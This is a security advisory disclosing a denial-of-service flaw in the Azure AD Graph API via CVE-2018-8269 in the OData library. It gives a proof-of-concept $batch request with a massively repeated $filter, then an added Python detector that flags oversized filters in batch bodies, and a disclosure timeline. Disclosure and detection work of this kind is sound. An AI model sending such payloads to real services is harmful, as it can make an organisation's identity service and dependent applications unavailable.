DOS vulnerability in Azure Active Directory Graph API

Aleph Research Advisory

Affected Products

  1. Azure Active Directory Graph API

Technical Details

A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.

Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.

The Azure Active Directory Graph API is a REST-based interface that provides programmatic access to this service.

Many applications use this API to interact with Azure Active Directory. If the Graph API is unavailable for an organization, all the applications that depend on it will probably be unavailable as well.

The vulnerability is a result of this service's dependency on the Microsoft.Data.OData library, which was vulnerable to a remote DoS (see CVE-2018-8269). The exploit can be done by sending an OData batch request that contains a $filter parameter with many repetitions of city+eq+'a'+or+city+eq+'a'+or+city+eq+'a'+ ....

Proof Of Concept

Here is an example of such a request.

POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1
Host: graph.windows.net
Authorization: Bearer XXXXX
content-type: multipart/mixed; boundary=RRR
Content-Length: 216

Content-type: application/http
Content-Transfer-Encoding: binary

GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1
accept: application/json;odata=minimalmetadata
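
Because the oversized $filter travels inside the $batch body rather than in the outer request line, a gateway or proxy that only inspects the outer URL never sees it. The following added example (not code from the advisory or from Microsoft) unwraps the inner request lines of a $batch body, measures how many logical operators and how deeply nested each $filter is, and rejects expressions above a threshold before they reach an OData parser. The thresholds, the TENANT_ID placeholder and the sample batch body are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Thresholds are assumptions chosen for illustration, not values from the advisory or from the fix.
MAX_LOGICAL_OPS = 50
MAX_PAREN_DEPTH = 10
LOGICAL_OP = re.compile(r"\b(?:and|or|not)\b", re.IGNORECASE)
REQUEST_LINE = re.compile(r"^(?:GET|POST|PATCH|PUT|DELETE)\s+(\S+)\s+HTTP/1\.[01]$")

def filter_complexity(expr):
    """Return (number of and/or/not operators, maximum parenthesis depth) of a $filter expression."""
    depth = max_depth = 0
    for ch in expr:
        if ch == "(":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == ")":
            depth = max(depth - 1, 0)
    return len(LOGICAL_OP.findall(expr)), max_depth

def is_abusive_url(url):
    """True if any $filter in the URL's query string exceeds the thresholds."""
    # parse_qs turns '+' into spaces and percent-decodes, so the regex sees "city eq 'a' or ...".
    for expr in parse_qs(urlsplit(url).query).get("$filter", []):
        ops, depth = filter_complexity(expr)
        if ops > MAX_LOGICAL_OPS or depth > MAX_PAREN_DEPTH:
            return True
    return False

def inner_urls(batch_body, boundary):
    """Extract the target URL of every inner request line in an OData $batch body."""
    urls = []
    for part in batch_body.split("--" + boundary):
        for line in part.splitlines():
            m = REQUEST_LINE.match(line.strip())
            if m:
                urls.append(m.group(1))
    return urls

def abusive_inner_requests(batch_body, boundary):
    """Inner request URLs whose $filter should be rejected before the OData parser sees them."""
    return [u for u in inner_urls(batch_body, boundary) if is_abusive_url(u)]

# Constructed sample $batch body modelled on the advisory's request; TENANT_ID is a placeholder.
BENIGN = "city+eq+'Seattle'+or+city+eq+'Tacoma'"
ABUSIVE = "+or+".join(["city+eq+'a'"] * 200)
PART = "--RRR\r\nContent-Type: application/http\r\nContent-Transfer-Encoding: binary\r\n\r\n"
SAMPLE_BATCH = (PART + "GET https://graph.windows.net/TENANT_ID/users?$filter=" + BENIGN + " HTTP/1.1\r\n\r\n"
                + PART + "GET https://graph.windows.net/TENANT_ID/users?$filter=" + ABUSIVE + " HTTP/1.1\r\n\r\n"
                + "--RRR--\r\n")
```

Running abusive_inner_requests(SAMPLE_BATCH, "RRR") returns only the second inner URL; the benign two-clause filter passes.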

Timeline

  • 22-Oct-18: Public disclosure.
  • 20-Oct-18: Vendor acknowledged report (We were able to reproduce the issue, and a fix has been applied.).
  • 15-Oct-18: Deadline.
  • 10-Oct-18: 14-day deadline extension offered.
  • 18-Jul-18: Reported (Microsoft Security Response Center).



External References